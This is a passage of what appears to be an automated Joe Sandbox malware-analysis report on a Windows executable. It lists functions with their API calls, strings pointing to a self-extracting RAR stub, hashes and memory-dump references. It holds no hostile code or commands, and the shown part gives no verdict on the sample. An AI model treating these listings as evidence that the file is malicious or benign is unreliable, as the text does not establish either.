                                                          Similarity
                                                          • API ID: AddressProc$HandleModule
                                                          • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                          • API String ID: 667068680-1718035505
                                                          • Opcode ID: 4f551330794e5fc359169f6bda56b51ffa3c357704af9fdc9e1e19d6ee511853
                                                          • Instruction ID: 6bb045e84c182a83e21283db7986d5d6ba86357af520652cfebfcdc4a8a9fae6
                                                          • Opcode Fuzzy Hash: 4f551330794e5fc359169f6bda56b51ffa3c357704af9fdc9e1e19d6ee511853
                                                          • Instruction Fuzzy Hash: B1F0CD32F727A39B0F314EB5AE8BF6632C86A25B69304043DEA45D7100EB29CD507B91
                                                          Function 00FC146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FC14C2
                                                            • Part of subcall function 00FBB146: GetVersionExW.KERNEL32(?), ref: 00FBB16B
                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00FC14E6
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FC1500
                                                          • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00FC1513
                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FC1523
                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FC1533
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Time$File$System$Local$SpecificVersion
                                                          • String ID:
                                                          • API String ID: 2092733347-0
                                                          • Opcode ID: ced8de4a41a793ab6a7c3e5392817587ed8ab069ae862b36412772bd4af9b761
                                                          • Instruction ID: 8d08874e61723ebaffe4ade9b34a6a8caba864ab2985a9a0d682cd08507ca1a9
                                                          • Opcode Fuzzy Hash: ced8de4a41a793ab6a7c3e5392817587ed8ab069ae862b36412772bd4af9b761
                                                          • Instruction Fuzzy Hash: 8C31F87550834AABC704DFA8C88999BB7F8BF98714F044A1EF995C3210E734D509CBA6
                                                          Function 00FD2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,00FD2AF1,00FD02FC,00FCFA34), ref: 00FD2B08
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FD2B16
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FD2B2F
                                                          • SetLastError.KERNEL32(00000000,00FD2AF1,00FD02FC,00FCFA34), ref: 00FD2B81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          • Opcode ID: 12bf2fcaf916953861af802aff3d58defd37f67a8f2427e92f803c3d4fa85e49
                                                          • Instruction ID: 0b20d68f5fcb33b035d56043b96eda64819aa76e29ecccf39476da576e3cbddd
                                                          • Opcode Fuzzy Hash: 12bf2fcaf916953861af802aff3d58defd37f67a8f2427e92f803c3d4fa85e49
                                                          • Instruction Fuzzy Hash: A10147325083192EA7542B747CC9A2A3B4BEFA27747380B3BF220493F0EF914C00B580
                                                          Function 00FD97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,00FF1030,00FD4674,00FF1030,?,?,00FD3F73,00000050,?,00FF1030,00000200), ref: 00FD97E9
                                                          • _free.LIBCMT ref: 00FD981C
                                                          • _free.LIBCMT ref: 00FD9844
                                                          • SetLastError.KERNEL32(00000000,?,00FF1030,00000200), ref: 00FD9851
                                                          • SetLastError.KERNEL32(00000000,?,00FF1030,00000200), ref: 00FD985D
                                                          • _abort.LIBCMT ref: 00FD9863
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$_free$_abort
                                                          • String ID:
                                                          • API String ID: 3160817290-0
                                                          • Opcode ID: e09ea4c2da2cce698efa89adf0647db91a746c0dcb68c6e5ba559610b5c03b75
                                                          • Instruction ID: 86b37ca7d2e30ad8f2588dec015920d388f56420415cadc09ae2db8278fb72f4
                                                          • Opcode Fuzzy Hash: e09ea4c2da2cce698efa89adf0647db91a746c0dcb68c6e5ba559610b5c03b75
                                                          • Instruction Fuzzy Hash: 23F0F43650860166C75233A4BC4EB5F3A678FD2F70F2C003AF624973D6EEA88802B525
                                                          Function 00FCDC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00FCDC47
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FCDC61
                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FCDC72
                                                          • TranslateMessage.USER32(?), ref: 00FCDC7C
                                                          • DispatchMessageW.USER32(?), ref: 00FCDC86
                                                          • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00FCDC91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                          • String ID:
                                                          • API String ID: 2148572870-0
                                                          • Opcode ID: d5b8b8627e202071ba1a99f57cbcf1ce29674ca4f1f6a02b8db37f8edccddeb1
                                                          • Instruction ID: 104cf5ce1cfbbb037bb011c5eadbf77bb929bfe6daf29f369dac4cf66b2b3842
                                                          • Opcode Fuzzy Hash: d5b8b8627e202071ba1a99f57cbcf1ce29674ca4f1f6a02b8db37f8edccddeb1
                                                          • Instruction Fuzzy Hash: 31F08C72E00219BBCF20ABE1DD4DEDF7FBDEF417A1B004021B50AE6004D6798546C7A0
                                                          Function 00FBC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00FC05DA: _wcslen.LIBCMT ref: 00FC05E0
                                                            • Part of subcall function 00FBB92D: _wcsrchr.LIBVCRUNTIME ref: 00FBB944
                                                          • _wcslen.LIBCMT ref: 00FBC197
                                                          • _wcslen.LIBCMT ref: 00FBC1DF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$_wcsrchr
                                                          • String ID: .exe$.rar$.sfx
                                                          • API String ID: 3513545583-31770016
                                                          • Opcode ID: 260856102646adfa25fd80c3899fff477325dd470f2b65d9482bec1d8032ad42
                                                          • Instruction ID: a0a336197978a1008649b71cc9153b08ffab74cfd160696d94e652137df2d664
                                                          • Opcode Fuzzy Hash: 260856102646adfa25fd80c3899fff477325dd470f2b65d9482bec1d8032ad42
                                                          • Instruction Fuzzy Hash: B0412822904351D6C731BF3A8C06EBB73A8EF41764F14090EF991AB182EB548D82FBD5
                                                          Function 00FCCE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTempPathW.KERNEL32(00000800,?), ref: 00FCCE9D
                                                            • Part of subcall function 00FBB690: _wcslen.LIBCMT ref: 00FBB696
                                                          • _swprintf.LIBCMT ref: 00FCCED1
                                                            • Part of subcall function 00FB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FB40A5
                                                          • SetDlgItemTextW.USER32(?,00000066,00FF946A), ref: 00FCCEF1
                                                          • EndDialog.USER32(?,00000001), ref: 00FCCFFE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                          • String ID: %s%s%u
                                                          • API String ID: 110358324-1360425832
                                                          • Opcode ID: aad132f8ef9a88c974cb389392abd730e2d5ed6fde1d3cb71338622aa79183ca
                                                          • Instruction ID: 81cd084641bdebc8c97495730440ae20675eaf369f41e9d32ec61ad5caa3f7a5
                                                          • Opcode Fuzzy Hash: aad132f8ef9a88c974cb389392abd730e2d5ed6fde1d3cb71338622aa79183ca
                                                          • Instruction Fuzzy Hash: 5D41647190015AA9DF25DB90CD46FEE77ACEF04350F4080AAF909E7051EB749A44EF71
                                                          Function 00FBBB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00FBBB27
                                                          • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00FBA275,?,?,00000800,?,00FBA23A,?,00FB755C), ref: 00FBBBC5
                                                          • _wcslen.LIBCMT ref: 00FBBC3B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$CurrentDirectory
                                                          • String ID: UNC$\\?\
                                                          • API String ID: 3341907918-253988292
                                                          • Opcode ID: db2af6d996475417477b4708e23987912516ce5b680ead091330d66b8fd20a69
                                                          • Instruction ID: de8f7f0e6d7977bd73c74fcd58e10188221a8dd67cc7b9a14ce9f47a64113a16
                                                          • Opcode Fuzzy Hash: db2af6d996475417477b4708e23987912516ce5b680ead091330d66b8fd20a69
                                                          • Instruction Fuzzy Hash: 7841C371800256B6CB21EF22CD06EEE7B69AF443A0F048465F954A3151DBB4DA91FE60
                                                          Function 00FCB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadBitmapW.USER32(00000065), ref: 00FCB6ED
                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00FCB712
                                                          • DeleteObject.GDI32(00000000), ref: 00FCB744
                                                          • DeleteObject.GDI32(00000000), ref: 00FCB767
                                                            • Part of subcall function 00FCA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00FCB73D,00000066), ref: 00FCA6D5
                                                            • Part of subcall function 00FCA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00FCB73D,00000066), ref: 00FCA6EC
                                                            • Part of subcall function 00FCA6C2: LoadResource.KERNEL32(00000000,?,?,?,00FCB73D,00000066), ref: 00FCA703
                                                            • Part of subcall function 00FCA6C2: LockResource.KERNEL32(00000000,?,?,?,00FCB73D,00000066), ref: 00FCA712
                                                            • Part of subcall function 00FCA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00FCB73D,00000066), ref: 00FCA72D
                                                            • Part of subcall function 00FCA6C2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,00FCB73D,00000066), ref: 00FCA73E
                                                            • Part of subcall function 00FCA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00FCA7A7
                                                            • Part of subcall function 00FCA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00FCA7C6
                                                            • Part of subcall function 00FCA6C2: GlobalFree.KERNEL32(00000000), ref: 00FCA7CD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                          • String ID: ]
                                                          • API String ID: 1428510222-3352871620
                                                          • Opcode ID: 18de3247cf7a3dc7811a6b3969d7909220691bf9cc6281356680c54c02d524ac
                                                          • Instruction ID: 2199529e258fe519f1b86a9b83b476d06bd1e08e70d9c3692341e2dd6bcecda4
                                                          • Opcode Fuzzy Hash: 18de3247cf7a3dc7811a6b3969d7909220691bf9cc6281356680c54c02d524ac
                                                          • Instruction Fuzzy Hash: C201C43A90010BA7C72277745E0BF7F7AB9AFC0766F090018FD40B7285DF6A8C056A61
                                                          Function 00FCD600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00FB1316: GetDlgItem.USER32(00000000,00003021), ref: 00FB135A
                                                            • Part of subcall function 00FB1316: SetWindowTextW.USER32(00000000,00FE35F4), ref: 00FB1370
                                                          • EndDialog.USER32(?,00000001), ref: 00FCD64B
                                                          • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00FCD661
                                                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 00FCD675
                                                          • SetDlgItemTextW.USER32(?,00000068), ref: 00FCD684
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ItemText$DialogWindow
                                                          • String ID: RENAMEDLG
                                                          • API String ID: 445417207-3299779563
                                                          • Opcode ID: dd8ea3e6f23b5998aff2ce63cfb80782982dd0f5b49ed0ad8f9c0142e00ecc2c
                                                          • Instruction ID: 4044fca3eed4ea1ff273a8e535513884131efacc9066675b390bd1132901529b
                                                          • Opcode Fuzzy Hash: dd8ea3e6f23b5998aff2ce63cfb80782982dd0f5b49ed0ad8f9c0142e00ecc2c
                                                          • Instruction Fuzzy Hash: 9A01F9336443167BD2318F649F0BF5E779CBB5AB11F010029F345A6089C7AB9804FB65
                                                          Function 00FD7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00FD7E24,00000000,?,00FD7DC4,00000000,00FEC300,0000000C,00FD7F1B,00000000,00000002), ref: 00FD7E93
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FD7EA6
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00FD7E24,00000000,?,00FD7DC4,00000000,00FEC300,0000000C,00FD7F1B,00000000,00000002), ref: 00FD7EC9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: aef576c1f44a0634e5361552a0b0178ba375a30c7c28fdf7dc88105e58739170
                                                          • Instruction ID: ab10ce2e71e5117470fa05b00cde72f72cadc1ed753f076880c98ca21f35f499
                                                          • Opcode Fuzzy Hash: aef576c1f44a0634e5361552a0b0178ba375a30c7c28fdf7dc88105e58739170
                                                          • Instruction Fuzzy Hash: 82F04431A0024CBBDB119BA1DC4DB9EBFB5EB44755F0440AAF905EB260DB309E44EA91
                                                          Function 00FBF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00FC081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FC0836
                                                            • Part of subcall function 00FC081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00FBF2D8,Crypt32.dll,00000000,00FBF35C,?,?,00FBF33E,?,?,?), ref: 00FC0858
                                                          • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00FBF2E4
                                                          • GetProcAddress.KERNEL32(00FF81C8,CryptUnprotectMemory), ref: 00FBF2F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                          • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                          • API String ID: 2141747552-1753850145
                                                          • Opcode ID: 440ed75ea88e32770f832a9de1ec3805f7c08c4e6189dcf2e114ff1cdbfc8270
                                                          • Instruction ID: 867179a0304ea524d57d85e37f48bc819c1f0ca61ad61a7f3958e4f9cdd72067
                                                          • Opcode Fuzzy Hash: 440ed75ea88e32770f832a9de1ec3805f7c08c4e6189dcf2e114ff1cdbfc8270
                                                          • Instruction Fuzzy Hash: 5BE08674D107869EC7209F369C4DB417AD46F04B14F14C86DF0DAD3664DAB8D581AF51
                                                          Function 00FD2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AdjustPointer$_abort
                                                          • String ID:
                                                          • API String ID: 2252061734-0
                                                          • Opcode ID: 87c8738d1c5193530ca907b0297d09d876f130ea213ec0bc4249138b5ded0af6
                                                          • Instruction ID: 51525b49b824a2c601319817cadc2cc30b665fdeb711de6c9b5eb3520df8ff32
                                                          • Opcode Fuzzy Hash: 87c8738d1c5193530ca907b0297d09d876f130ea213ec0bc4249138b5ded0af6
                                                          • Instruction Fuzzy Hash: DF51CF72A01212AFDB698F14D945BAAB3A7BF64320F28452BE801473A1D736ED41F7D0
                                                          Function 00FDBF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00FDBF39
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FDBF5C
                                                            • Part of subcall function 00FD8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FDCA2C,00000000,?,00FD6CBE,?,00000008,?,00FD91E0,?,?,?), ref: 00FD8E38
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00FDBF82
                                                          • _free.LIBCMT ref: 00FDBF95
                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00FDBFA4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                          • String ID:
                                                          • API String ID: 336800556-0
                                                          • Opcode ID: 6d3c725058211637dcf95288e8c93f2024b2b585c79c68f6518966b1a41f1d52
                                                          • Instruction ID: 4bfe28045ac409b477b0385510e8fba38b5737c5e6b7dd861032a9a0c5f40efc
                                                          • Opcode Fuzzy Hash: 6d3c725058211637dcf95288e8c93f2024b2b585c79c68f6518966b1a41f1d52
